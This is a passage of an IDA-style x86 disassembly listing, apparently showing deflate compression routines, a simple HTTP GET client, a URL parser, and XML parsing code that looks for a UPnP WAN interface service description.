sub eax, edx
mov ebx, eax
sar ebx, 1
jmp short loc_9B1200
; ---------------------------------------------------------------------------
loc_9B11F6: ; CODE XREF: sub_9B1122+E1�j
push ebx
mov eax, esi
call sub_9B01F7
pop ecx
dec ebx
loc_9B1200: ; CODE XREF: sub_9B1122+D2�j
cmp ebx, 1
jge short loc_9B11F6
mov eax, [ebp+var_4]
mov [ebp+var_C], eax
loc_9B120B: ; CODE XREF: sub_9B1122+1A7�j
mov eax, [esi+1450h]
mov ecx, [esi+eax*4+0B5Ch]
mov ebx, [esi+0B60h]
dec eax
mov [esi+1450h], eax
push 1
mov eax, esi
mov [esi+0B60h], ecx
call sub_9B01F7
dec dword ptr [esi+1454h]
mov eax, [esi+0B60h]
pop ecx
mov ecx, [esi+1454h]
mov [esi+ecx*4+0B5Ch], ebx
dec dword ptr [esi+1454h]
mov ecx, [esi+1454h]
mov [esi+ecx*4+0B5Ch], eax
lea ecx, [edi+eax*4]
mov [ebp+var_10], ecx
mov cx, [ecx]
lea edx, [edi+ebx*4]
add cx, [edx]
mov [ebp+var_14], edx
mov dx, cx
mov ecx, [ebp+var_C]
mov [edi+ecx*4], dx
mov bl, [esi+ebx+1458h]
mov al, [esi+eax+1458h]
cmp bl, al
jb short loc_9B1294
movzx eax, bl
jmp short loc_9B1297
; ---------------------------------------------------------------------------
loc_9B1294: ; CODE XREF: sub_9B1122+16B�j
movzx eax, al
loc_9B1297: ; CODE XREF: sub_9B1122+170�j
inc al
mov [esi+ecx+1458h], al
mov eax, [ebp+var_10]
mov [eax+2], cx
mov eax, [ebp+var_14]
mov [eax+2], cx
mov [esi+0B60h], ecx
inc ecx
push 1
mov eax, esi
mov [ebp+var_C], ecx
call sub_9B01F7
cmp dword ptr [esi+1450h], 2
pop ecx
jge loc_9B120B
dec dword ptr [esi+1454h]
mov eax, [esi+1454h]
mov ecx, [esi+0B60h]
mov [esi+eax*4+0B5Ch], ecx
mov eax, [ebp+arg_0]
mov edx, esi
call sub_9B02A7
push [ebp+var_8]
lea edx, [esi+0B3Ch]
mov ebx, edi
call sub_9B10B4
pop ecx
pop edi
pop ebx
leave
retn
sub_9B1122 endp
; =============== S U B R O U T I N E =======================================
sub_9B1307 proc near ; CODE XREF: sub_9B13EF+44�p
push esi
mov esi, eax
mov ecx, [esi+0B1Ch]
lea eax, [esi+94h]
push esi
call sub_9B045F
mov ecx, [esi+0B28h]
lea eax, [esi+988h]
push esi
call sub_9B045F
lea eax, [esi+0B30h]
push eax
call sub_9B1122
add esp, 0Ch
push 12h
pop eax
loc_9B1340: ; CODE XREF: sub_9B1307+4F�j
movzx ecx, byte_9A581C[eax]
cmp word ptr [esi+ecx*4+0A7Eh], 0
jnz short loc_9B1358
dec eax
cmp eax, 3
jge short loc_9B1340
loc_9B1358: ; CODE XREF: sub_9B1307+49�j
lea ecx, [eax+eax*2+11h]
add [esi+16A8h], ecx
pop esi
retn
sub_9B1307 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B1364 proc near ; CODE XREF: sub_9B13EF+82�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
mov ecx, [eax+16BCh]
cmp ecx, 0Dh
jle short loc_9B13CA
push ebx
push esi
mov esi, [ebp+arg_C]
mov edx, esi
shl edx, cl
mov ecx, [eax+8]
or [eax+16B8h], dx
mov edx, [eax+14h]
mov bl, [eax+16B8h]
mov [ecx+edx], bl
inc dword ptr [eax+14h]
mov ecx, [eax+14h]
mov bl, [eax+16B9h]
mov edx, [eax+8]
mov [ecx+edx], bl
mov edx, [eax+16BCh]
inc dword ptr [eax+14h]
mov cl, 10h
sub cl, dl
shr si, cl
add edx, 0FFFFFFF3h
mov [eax+16BCh], edx
mov [eax+16B8h], si
pop esi
pop ebx
jmp short loc_9B13DF
; ---------------------------------------------------------------------------
loc_9B13CA: ; CODE XREF: sub_9B1364+F�j
mov edx, [ebp+arg_C]
shl edx, cl
or [eax+16B8h], dx
add ecx, 3
mov [eax+16BCh], ecx
loc_9B13DF: ; CODE XREF: sub_9B1364+64�j
mov ecx, [ebp+arg_8]
mov edx, [ebp+arg_4]
push 1
call sub_9B103C
pop ecx
pop ebp
retn
sub_9B1364 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B13EF proc near ; CODE XREF: sub_9AD804+64�p
; sub_9AD804+A5�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
xor eax, eax
cmp [esi+84h], eax
push edi
mov edi, [ebp+arg_8]
jle short loc_9B1456
cmp edi, eax
jbe short loc_9B1417
mov eax, [esi]
cmp dword ptr [eax+2Ch], 2
jnz short loc_9B1417
mov edx, esi
call sub_9B0FA3
loc_9B1417: ; CODE XREF: sub_9B13EF+17�j
; sub_9B13EF+1F�j
lea eax, [esi+0B18h]
push eax
call sub_9B1122
lea eax, [esi+0B24h]
push eax
call sub_9B1122
pop ecx
pop ecx
mov eax, esi
call sub_9B1307
mov edx, [esi+16A8h]
mov ecx, [esi+16ACh]
add edx, 0Ah
add ecx, 0Ah
shr edx, 3
shr ecx, 3
cmp ecx, edx
ja short loc_9B145B
jmp short loc_9B1459
; ---------------------------------------------------------------------------
loc_9B1456: ; CODE XREF: sub_9B13EF+13�j
lea ecx, [edi+5]
loc_9B1459: ; CODE XREF: sub_9B13EF+65�j
mov edx, ecx
loc_9B145B: ; CODE XREF: sub_9B13EF+63�j
push ebx
lea ebx, [edi+4]
cmp ebx, edx
ja short loc_9B147E
cmp [ebp+arg_4], 0
jz short loc_9B147E
push [ebp+arg_C]
push edi
push [ebp+arg_4]
push esi
call sub_9B1364
add esp, 10h
jmp loc_9B15BE
; ---------------------------------------------------------------------------
loc_9B147E: ; CODE XREF: sub_9B13EF+72�j
; sub_9B13EF+78�j
cmp dword ptr [esi+88h], 4
jz loc_9B153A
cmp ecx, edx
jz loc_9B153A
mov edx, [ebp+arg_C]
mov ecx, [esi+16BCh]
add edx, 4
cmp ecx, 0Dh
jle short loc_9B14F2
mov edi, edx
shl edi, cl
mov ecx, [esi+8]
or [esi+16B8h], di
mov edi, [esi+14h]
mov bl, [esi+16B8h]
mov [ecx+edi], bl
inc dword ptr [esi+14h]
mov ecx, [esi+14h]
mov bl, [esi+16B9h]
mov edi, [esi+8]
mov [ecx+edi], bl
mov ebx, [esi+16BCh]
inc dword ptr [esi+14h]
mov cl, 10h
sub cl, bl
shr dx, cl
add ebx, 0FFFFFFF3h
mov [esi+16BCh], ebx
mov [esi+16B8h], dx
jmp short loc_9B1504
; ---------------------------------------------------------------------------
loc_9B14F2: ; CODE XREF: sub_9B13EF+B3�j
shl edx, cl
or [esi+16B8h], dx
add ecx, 3
mov [esi+16BCh], ecx
loc_9B1504: ; CODE XREF: sub_9B13EF+101�j
inc eax
push eax
mov eax, [esi+0B28h]
inc eax
push eax
mov eax, [esi+0B1Ch]
inc eax
push eax
mov eax, esi
call sub_9B09B8
lea eax, [esi+988h]
push eax
lea eax, [esi+94h]
push eax
mov eax, esi
call sub_9B0BF1
add esp, 14h
jmp loc_9B15BE
; ---------------------------------------------------------------------------
loc_9B153A: ; CODE XREF: sub_9B13EF+96�j
; sub_9B13EF+9E�j
mov eax, [ebp+arg_C]
mov ecx, [esi+16BCh]
add eax, 2
cmp ecx, 0Dh
jle short loc_9B1599
mov edx, eax
shl edx, cl
mov ecx, [esi+8]
or [esi+16B8h], dx
mov edx, [esi+14h]
mov bl, [esi+16B8h]
mov [ecx+edx], bl
inc dword ptr [esi+14h]
mov ecx, [esi+14h]
mov edx, [esi+8]
mov bl, [esi+16B9h]
mov [ecx+edx], bl
mov edx, [esi+16BCh]
inc dword ptr [esi+14h]
mov cl, 10h
sub cl, dl
shr ax, cl
add edx, 0FFFFFFF3h
mov [esi+16BCh], edx
mov [esi+16B8h], ax
jmp short loc_9B15AB
; ---------------------------------------------------------------------------
loc_9B1599: ; CODE XREF: sub_9B13EF+15A�j
shl eax, cl
or [esi+16B8h], ax
add ecx, 3
mov [esi+16BCh], ecx
loc_9B15AB: ; CODE XREF: sub_9B13EF+1A8�j
push offset dword_9A5CB0
push offset dword_9A5830
mov eax, esi
call sub_9B0BF1
pop ecx
pop ecx
loc_9B15BE: ; CODE XREF: sub_9B13EF+8A�j
; sub_9B13EF+146�j
mov eax, esi
call sub_9B0199
cmp [ebp+arg_C], 0
pop ebx
pop edi
jz short loc_9B15D4
pop esi
pop ebp
jmp sub_9B0FE5
; ---------------------------------------------------------------------------
loc_9B15D4: ; CODE XREF: sub_9B13EF+1DC�j
pop esi
pop ebp
retn
sub_9B13EF endp
; ---------------------------------------------------------------------------
loc_9B15D7: ; DATA XREF: sub_9AE031+34�o
mov eax, [esp+8]
imul eax, [esp+0Ch]
push eax
call dword_9A11BC ; malloc
pop ecx
retn
; ---------------------------------------------------------------------------
loc_9B15E9: ; DATA XREF: sub_9AE031+43�o
push dword ptr [esp+8]
call dword_9A11D0 ; free
pop ecx
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B15F5 proc near ; CODE XREF: sub_9B18FC+42�p
var_834 = byte ptr -834h
var_833 = byte ptr -833h
var_832 = byte ptr -832h
var_831 = byte ptr -831h
var_830 = byte ptr -830h
var_34 = byte ptr -34h
var_30 = dword ptr -30h
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = byte ptr -20h
var_1C = byte ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 834h
mov eax, [ebp+arg_C]
push edi
push [ebp+arg_0]
xor edi, edi
mov [eax], edi
call dword_9A127C ; gethostbyname
cmp eax, edi
jnz short loc_9B161A
xor eax, eax
jmp loc_9B17FE
; ---------------------------------------------------------------------------
loc_9B161A: ; CODE XREF: sub_9B15F5+1C�j
mov eax, [eax+0Ch]
push ebx
push 4
push dword ptr [eax]
lea eax, [ebp+var_20]
push eax
call sub_9B323A ; memcpy
push 8
lea eax, [ebp+var_1C]
push edi
push eax
call sub_9B3240 ; memset
add esp, 18h
push edi
push 1
push 2
call dword_9A12AC ; socket
mov ebx, eax
cmp ebx, edi
mov [ebp+var_10], ebx
jge short loc_9B1655
xor eax, eax
jmp loc_9B17FD
; ---------------------------------------------------------------------------
loc_9B1655: ; CODE XREF: sub_9B15F5+57�j
push esi
push [ebp+arg_4]
mov [ebp+var_24], 2
call dword_9A1294 ; ntohs
push 10h
pop esi
mov [ebp+var_22], ax
push esi
lea eax, [ebp+var_24]
push eax
push ebx
call dword_9A1298 ; connect
test eax, eax
jl loc_9B17F3
cmp [ebp+arg_10], edi
jz short loc_9B16B0
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_34]
push eax
push ebx
mov [ebp+var_8], esi
call dword_9A1274 ; getsockname
push [ebp+arg_14]
push [ebp+var_30]
call dword_9A1288 ; inet_ntoa
push eax
push [ebp+arg_10]
call dword_9A11E0 ; strncpy
add esp, 0Ch
loc_9B16B0: ; CODE XREF: sub_9B15F5+8E�j
movzx eax, word ptr [ebp+arg_4]
push eax
push [ebp+arg_0]
mov esi, 800h
push [ebp+arg_8]
lea eax, [ebp+var_834]
push offset aGetSHttp1_1Hos ; "GET %s HTTP/1.1\r\nHost: %s:%d\r\nConnectio"...
push esi
push eax
call dword_9A11D4 ; _snprintf
add esp, 18h
lea eax, [ebp+var_834]
push edi
push eax
call sub_9B322E ; strlen
pop ecx
push eax
lea eax, [ebp+var_834]
push eax
push ebx
call dword_9A1270 ; send
push 1388h
push esi
lea eax, [ebp+var_834]
push eax
mov [ebp+var_14], 1
mov [ebp+var_4], edi
push ebx
jmp loc_9B17D6
; ---------------------------------------------------------------------------
loc_9B1710: ; CODE XREF: sub_9B15F5+1ED�j
cmp [ebp+var_14], 0
jz loc_9B179D
xor eax, eax
lea ecx, [ebx-3]
test ecx, ecx
mov [ebp+var_8], eax
jle loc_9B17C6
loc_9B172A: ; CODE XREF: sub_9B15F5+163�j
cmp [ebp+eax+var_834], 0Dh
jnz short loc_9B1752
cmp [ebp+eax+var_833], 0Ah
jnz short loc_9B1752
cmp [ebp+eax+var_832], 0Dh
jnz short loc_9B1752
cmp [ebp+eax+var_831], 0Ah
jz short loc_9B175C
loc_9B1752: ; CODE XREF: sub_9B15F5+13D�j
; sub_9B15F5+147�j ...
inc eax
cmp eax, ecx
mov [ebp+var_8], eax
jl short loc_9B172A
jmp short loc_9B17C6
; ---------------------------------------------------------------------------
loc_9B175C: ; CODE XREF: sub_9B15F5+15B�j
and [ebp+var_14], 0
lea ecx, [ebx-4]
cmp eax, ecx
jge short loc_9B17C6
sub ebx, eax
mov [ebp+var_C], ebx
add ebx, edi
lea eax, [ebx-4]
push eax
push [ebp+var_4]
call dword_9A1148 ; realloc
mov ecx, [ebp+var_C]
add ecx, 0FFFFFFFCh
push ecx
mov ecx, [ebp+var_8]
lea ecx, [ebp+ecx+var_830]
push ecx
add edi, eax
push edi
mov [ebp+var_4], eax
call sub_9B323A ; memcpy
lea edi, [ebx-4]
jmp short loc_9B17C3
; ---------------------------------------------------------------------------
loc_9B179D: ; CODE XREF: sub_9B15F5+11F�j
lea eax, [ebx+edi]
push eax
push [ebp+var_4]
mov [ebp+var_C], eax
call dword_9A1148 ; realloc
push ebx
lea ecx, [ebp+var_834]
push ecx
add edi, eax
push edi
mov [ebp+var_4], eax
call sub_9B323A ; memcpy
mov edi, [ebp+var_C]
loc_9B17C3: ; CODE XREF: sub_9B15F5+1A6�j
add esp, 14h
loc_9B17C6: ; CODE XREF: sub_9B15F5+12F�j
; sub_9B15F5+165�j ...
push 1388h
push esi
lea eax, [ebp+var_834]
push eax
push [ebp+var_10]
loc_9B17D6: ; CODE XREF: sub_9B15F5+116�j
call sub_9B21B5
mov ebx, eax
add esp, 10h
test ebx, ebx
jg loc_9B1710
mov eax, [ebp+arg_C]
mov ebx, [ebp+var_10]
mov [eax], edi
mov edi, [ebp+var_4]
loc_9B17F3: ; CODE XREF: sub_9B15F5+85�j
push ebx
call dword_9A1284 ; closesocket
mov eax, edi
pop esi
loc_9B17FD: ; CODE XREF: sub_9B15F5+5B�j
pop ebx
loc_9B17FE: ; CODE XREF: sub_9B15F5+20�j
pop edi
leave
retn
sub_9B15F5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B1801 proc near ; CODE XREF: sub_9B18FC+27�p
; sub_9B234F+120�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
push offset asc_9A61F4 ; "://"
push esi
call dword_9A11C4 ; strstr
mov ebx, eax
test ebx, ebx
pop ecx
pop ecx
jz loc_9B18F5
add ebx, 3
cmp byte ptr [esi], 68h
jnz loc_9B18F5
cmp byte ptr [esi+1], 74h
jnz loc_9B18F5
cmp byte ptr [esi+2], 74h
jnz loc_9B18F5
cmp byte ptr [esi+3], 70h
jnz loc_9B18F5
mov edi, dword_9A1144
push 3Ah
push ebx
call edi ; dword_9A1144
push 2Fh
push ebx
mov esi, eax
call edi ; dword_9A1144
mov edi, eax
add esp, 10h
test edi, edi
jz loc_9B18F5
push 41h
push 0
push [ebp+arg_4]
call sub_9B3240 ; memset
add esp, 0Ch
test esi, esi
jz short loc_9B18C9
cmp esi, edi
ja short loc_9B18C9
mov eax, esi
sub eax, ebx
cmp eax, 40h
jle short loc_9B188E
push 40h
pop eax
loc_9B188E: ; CODE XREF: sub_9B1801+88�j
push eax
push ebx
push [ebp+arg_4]
call dword_9A11E0 ; strncpy
mov ecx, [ebp+arg_8]
add esp, 0Ch
and word ptr [ecx], 0
jmp short loc_9B18C0
; ---------------------------------------------------------------------------
loc_9B18A5: ; CODE XREF: sub_9B1801+C4�j
cmp al, 39h
jg short loc_9B18EB
xor eax, eax
mov ax, [ecx]
imul ax, 0Ah
mov [ecx], ax
movsx dx, byte ptr [esi]
lea eax, [edx+eax-30h]
mov [ecx], ax
loc_9B18C0: ; CODE XREF: sub_9B1801+A2�j
inc esi
mov al, [esi]
cmp al, 30h
jge short loc_9B18A5
jmp short loc_9B18EB
; ---------------------------------------------------------------------------
loc_9B18C9: ; CODE XREF: sub_9B1801+7B�j
; sub_9B1801+7F�j
mov eax, edi
sub eax, ebx
cmp eax, 40h
jle short loc_9B18D5
push 40h
pop eax
loc_9B18D5: ; CODE XREF: sub_9B1801+CF�j
push eax
push ebx
push [ebp+arg_4]
call dword_9A11E0 ; strncpy
mov eax, [ebp+arg_8]
add esp, 0Ch
mov word ptr [eax], 50h
loc_9B18EB: ; CODE XREF: sub_9B1801+A6�j
; sub_9B1801+C6�j
mov eax, [ebp+arg_C]
mov [eax], edi
xor eax, eax
inc eax
jmp short loc_9B18F7
; ---------------------------------------------------------------------------
loc_9B18F5: ; CODE XREF: sub_9B1801+1B�j
; sub_9B1801+27�j ...
xor eax, eax
loc_9B18F7: ; CODE XREF: sub_9B1801+F2�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_9B1801 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B18FC proc near ; CODE XREF: sub_9B2260+32�p
var_44 = byte ptr -44h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 44h
push esi
mov esi, [ebp+arg_8]
push edi
mov edi, [ebp+arg_4]
and dword ptr [edi], 0
test esi, esi
jz short loc_9B1914
mov byte ptr [esi], 0
loc_9B1914: ; CODE XREF: sub_9B18FC+13�j
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+arg_8]
push eax
lea eax, [ebp+var_44]
push eax
push [ebp+arg_0]
call sub_9B1801
add esp, 10h
test eax, eax
jz short loc_9B1946
push [ebp+arg_C]
lea eax, [ebp+var_44]
push esi
push edi
push [ebp+arg_4]
push [ebp+arg_8]
push eax
call sub_9B15F5
add esp, 18h
loc_9B1946: ; CODE XREF: sub_9B18FC+31�j
pop edi
pop esi
leave
retn
sub_9B18FC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B194A proc near ; CODE XREF: sub_9B1AA4+97�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
jmp loc_9B1A8C
; ---------------------------------------------------------------------------
loc_9B195A: ; CODE XREF: sub_9B194A+148�j
mov ecx, [esi+8]
mov al, [ecx]
cmp al, 2Fh
jz loc_9B1A9D
cmp al, 3Eh
jz loc_9B1A9D
mov bl, 20h
cmp al, bl
jz loc_9B1A89
cmp al, 9
jz loc_9B1A89
cmp al, 0Dh
jz loc_9B1A89
cmp al, 0Ah
jz loc_9B1A89
and [ebp+arg_0], 0
mov dl, 3Dh
cmp al, dl
mov [ebp+var_8], ecx
jz short loc_9B19C6
loc_9B199E: ; CODE XREF: sub_9B194A+7A�j
mov eax, [esi+8]
mov cl, [eax]
cmp cl, bl
jz short loc_9B19C6
cmp cl, 9
jz short loc_9B19C6
cmp cl, 0Dh
jz short loc_9B19C6
cmp cl, 0Ah
jz short loc_9B19C6
inc [ebp+arg_0]
inc eax
cmp eax, [esi+4]
mov [esi+8], eax
jnb short loc_9B1A03
cmp [eax], dl
jnz short loc_9B199E
loc_9B19C6: ; CODE XREF: sub_9B194A+52�j
; sub_9B194A+5B�j ...
mov eax, [esi+8]
cmp [eax], dl
jz short loc_9B19DF
mov eax, [esi+4]
loc_9B19D0: ; CODE XREF: sub_9B194A+93�j
inc dword ptr [esi+8]
cmp [esi+8], eax
jnb short loc_9B1A03
mov ecx, [esi+8]
cmp [ecx], dl
jnz short loc_9B19D0
loc_9B19DF: ; CODE XREF: sub_9B194A+81�j
inc dword ptr [esi+8]
mov eax, [esi+8]
loc_9B19E5: ; CODE XREF: sub_9B194A+B7�j
mov cl, [eax]
cmp cl, bl
jz short loc_9B19FA
cmp cl, 9
jz short loc_9B19FA
cmp cl, 0Dh
jz short loc_9B19FA
cmp cl, 0Ah
jnz short loc_9B1A0B
loc_9B19FA: ; CODE XREF: sub_9B194A+9F�j
; sub_9B194A+A4�j ...
inc eax
cmp eax, [esi+4]
mov [esi+8], eax
jb short loc_9B19E5
loc_9B1A03: ; CODE XREF: sub_9B194A+76�j
; sub_9B194A+8C�j ...
or eax, 0FFFFFFFFh
loc_9B1A06: ; CODE XREF: sub_9B194A+155�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_9B1A0B: ; CODE XREF: sub_9B194A+AE�j
mov cl, [eax]
cmp cl, 27h
jz short loc_9B1A4D
cmp cl, 22h
jz short loc_9B1A4D
xor edi, edi
cmp cl, bl
mov [ebp+var_4], eax
jz short loc_9B1A70
loc_9B1A20: ; CODE XREF: sub_9B194A+FF�j
mov cl, [eax]
cmp cl, 9
jz short loc_9B1A70
cmp cl, 0Dh
jz short loc_9B1A70
cmp cl, 0Ah
jz short loc_9B1A70
cmp cl, 3Eh
jz short loc_9B1A70
cmp cl, 2Fh
jz short loc_9B1A70
inc edi
inc eax
cmp eax, [esi+4]
mov [esi+8], eax
jnb short loc_9B1A03
mov ecx, eax
cmp [ecx], bl
jnz short loc_9B1A20
jmp short loc_9B1A70
; ---------------------------------------------------------------------------
loc_9B1A4D: ; CODE XREF: sub_9B194A+C6�j
; sub_9B194A+CB�j
mov edx, [esi+4]
inc eax
cmp eax, edx
mov [esi+8], eax
jnb short loc_9B1A03
xor edi, edi
cmp [eax], cl
mov [ebp+var_4], eax
jz short loc_9B1A70
loc_9B1A61: ; CODE XREF: sub_9B194A+124�j
inc edi
inc eax
cmp eax, edx
mov [esi+8], eax
jnb short loc_9B1A03
mov ebx, eax
cmp [ebx], cl
jnz short loc_9B1A61
loc_9B1A70: ; CODE XREF: sub_9B194A+D4�j
; sub_9B194A+DB�j ...
mov eax, [esi+20h]
test eax, eax
jz short loc_9B1A89
push edi
push [ebp+var_4]
push [ebp+arg_0]
push [ebp+var_8]
push dword ptr [esi+10h]
call eax
add esp, 14h
loc_9B1A89: ; CODE XREF: sub_9B194A+29�j
; sub_9B194A+31�j ...
inc dword ptr [esi+8]
loc_9B1A8C: ; CODE XREF: sub_9B194A+B�j
mov eax, [esi+8]
cmp eax, [esi+4]
jb loc_9B195A
jmp loc_9B1A03
; ---------------------------------------------------------------------------
loc_9B1A9D: ; CODE XREF: sub_9B194A+17�j
; sub_9B194A+1F�j
xor eax, eax
jmp loc_9B1A06
sub_9B194A endp
; =============== S U B R O U T I N E =======================================
sub_9B1AA4 proc near ; CODE XREF: sub_9B1C02+12�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+4]
dec eax
cmp [esi+8], eax
jnb loc_9B1C00
push ebx
push edi
loc_9B1AB8: ; CODE XREF: sub_9B1AA4+154�j
mov ecx, [esi+8]
cmp byte ptr [ecx], 3Ch
jnz loc_9B1BED
lea eax, [ecx+1]
cmp byte ptr [eax], 3Fh
jz loc_9B1BED
xor edx, edx
mov [esi+8], eax
cmp byte ptr [eax], 20h
mov edi, eax
jz loc_9B1BAB
loc_9B1AE0: ; CODE XREF: sub_9B1AA4+7B�j
mov eax, [esi+8]
mov cl, [eax]
cmp cl, 9
jz short loc_9B1B21
cmp cl, 0Dh
jz short loc_9B1B21
cmp cl, 0Ah
jz short loc_9B1B21
cmp cl, 3Eh
jz short loc_9B1B21
cmp cl, 2Fh
jz short loc_9B1B21
inc edx
inc eax
cmp eax, [esi+4]
mov [esi+8], eax
jnb loc_9B1BFE
cmp byte ptr [eax], 3Ah
jnz short loc_9B1B19
xor edx, edx
inc eax
mov [esi+8], eax
mov edi, eax
loc_9B1B19: ; CODE XREF: sub_9B1AA4+6B�j
mov eax, [esi+8]
cmp byte ptr [eax], 20h
jnz short loc_9B1AE0
loc_9B1B21: ; CODE XREF: sub_9B1AA4+44�j
; sub_9B1AA4+49�j ...
test edx, edx
jle loc_9B1BAB
mov eax, [esi+14h]
test eax, eax
jz short loc_9B1B3A
push edx
push edi
push dword ptr [esi+10h]
call eax
add esp, 0Ch
loc_9B1B3A: ; CODE XREF: sub_9B1AA4+8A�j
push esi
call sub_9B194A
test eax, eax
pop ecx
jnz loc_9B1BFE
mov eax, [esi+8]
cmp byte ptr [eax], 2Fh
jz loc_9B1BF1
mov ecx, [esi+4]
xor edi, edi
inc eax
mov ebx, eax
jmp short loc_9B1B76
; ---------------------------------------------------------------------------
loc_9B1B5F: ; CODE XREF: sub_9B1AA4+D7�j
mov dl, [eax]
cmp dl, 20h
jz short loc_9B1B75
cmp dl, 9
jz short loc_9B1B75
cmp dl, 0Dh
jz short loc_9B1B75
cmp dl, 0Ah
jnz short loc_9B1B7F
loc_9B1B75: ; CODE XREF: sub_9B1AA4+C0�j
; sub_9B1AA4+C5�j ...
inc eax
loc_9B1B76: ; CODE XREF: sub_9B1AA4+B9�j
cmp eax, ecx
mov [esi+8], eax
jb short loc_9B1B5F
jmp short loc_9B1BFE
; ---------------------------------------------------------------------------
loc_9B1B7F: ; CODE XREF: sub_9B1AA4+CF�j
cmp byte ptr [eax], 3Ch
jz short loc_9B1BF1
loc_9B1B84: ; CODE XREF: sub_9B1AA4+EE�j
inc edi
inc eax
cmp eax, ecx
mov [esi+8], eax
jnb short loc_9B1BFE
mov edx, eax
cmp byte ptr [edx], 3Ch
jnz short loc_9B1B84
test edi, edi
jle short loc_9B1BF1
mov eax, [esi+1Ch]
test eax, eax
jz short loc_9B1BF1
push edi
push ebx
push dword ptr [esi+10h]
call eax
add esp, 0Ch
jmp short loc_9B1BF1
; ---------------------------------------------------------------------------
loc_9B1BAB: ; CODE XREF: sub_9B1AA4+36�j
; sub_9B1AA4+7F�j
mov eax, [esi+8]
cmp byte ptr [eax], 2Fh
jnz short loc_9B1BF1
mov ecx, [esi+4]
xor edx, edx
inc eax
cmp eax, ecx
mov [esi+8], eax
mov edi, eax
jnb short loc_9B1BFE
cmp byte ptr [eax], 3Eh
jz short loc_9B1BD7
loc_9B1BC7: ; CODE XREF: sub_9B1AA4+131�j
inc edx
inc eax
cmp eax, ecx
mov [esi+8], eax
jnb short loc_9B1BFE
mov ebx, eax
cmp byte ptr [ebx], 3Eh
jnz short loc_9B1BC7
loc_9B1BD7: ; CODE XREF: sub_9B1AA4+121�j
mov eax, [esi+18h]
test eax, eax
jz short loc_9B1BE8
push edx
push edi
push dword ptr [esi+10h]
call eax
add esp, 0Ch
loc_9B1BE8: ; CODE XREF: sub_9B1AA4+138�j
inc dword ptr [esi+8]
jmp short loc_9B1BF1
; ---------------------------------------------------------------------------
loc_9B1BED: ; CODE XREF: sub_9B1AA4+1A�j
; sub_9B1AA4+26�j
inc ecx
mov [esi+8], ecx
loc_9B1BF1: ; CODE XREF: sub_9B1AA4+AB�j
; sub_9B1AA4+DE�j ...
mov eax, [esi+4]
dec eax
cmp [esi+8], eax
jb loc_9B1AB8
loc_9B1BFE: ; CODE XREF: sub_9B1AA4+62�j
; sub_9B1AA4+9F�j ...
pop edi
pop ebx
loc_9B1C00: ; CODE XREF: sub_9B1AA4+C�j
pop esi
retn
sub_9B1AA4 endp
; =============== S U B R O U T I N E =======================================
sub_9B1C02 proc near ; CODE XREF: sub_9B1EDE+35�p
; sub_9B2872+34�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, [eax]
mov edx, [eax+0Ch]
add edx, ecx
push eax
mov [eax+8], ecx
mov [eax+4], edx
call sub_9B1AA4
pop ecx
retn
sub_9B1C02 endp
; =============== S U B R O U T I N E =======================================
sub_9B1C1B proc near ; DATA XREF: sub_9B1EDE+20�o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
push esi
mov esi, [esp+8+arg_0]
push edi
mov edi, [esp+0Ch+arg_8]
push edi
push [esp+10h+arg_4]
push esi
call sub_9B323A ; memcpy
xor bl, bl
add esp, 0Ch
mov [esi+edi], bl
inc dword ptr [esi+100h]
cmp edi, 7
jnz short loc_9B1C72
push edi
push offset aService ; "service"
push [esp+14h+arg_4]
call sub_9B333C ; memcmp
add esp, 0Ch
test eax, eax
jnz short loc_9B1C72
mov [esi+504h], bl
mov [esi+584h], bl
mov [esi+604h], bl
mov [esi+684h], bl
loc_9B1C72: ; CODE XREF: sub_9B1C1B+27�j
; sub_9B1C1B+3D�j
pop edi
pop esi
pop ebx
retn
sub_9B1C1B endp
; =============== S U B R O U T I N E =======================================
sub_9B1C76 proc near ; DATA XREF: sub_9B1EDE+27�o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_0]
dec dword ptr [esi+100h]
cmp [esp+4+arg_8], 7
jnz loc_9B1D7F
push 7
push offset aService ; "service"
push [esp+0Ch+arg_4]
call sub_9B333C ; memcmp
add esp, 0Ch
test eax, eax
jnz loc_9B1D7F
push ebx
push edi
lea ebx, [esi+684h]
push offset aUrnSchemasUpnp ; "urn:schemas-upnp-org:service:WANCommonI"...
push ebx
call sub_9B3342 ; strcmp
test eax, eax
pop ecx
pop ecx
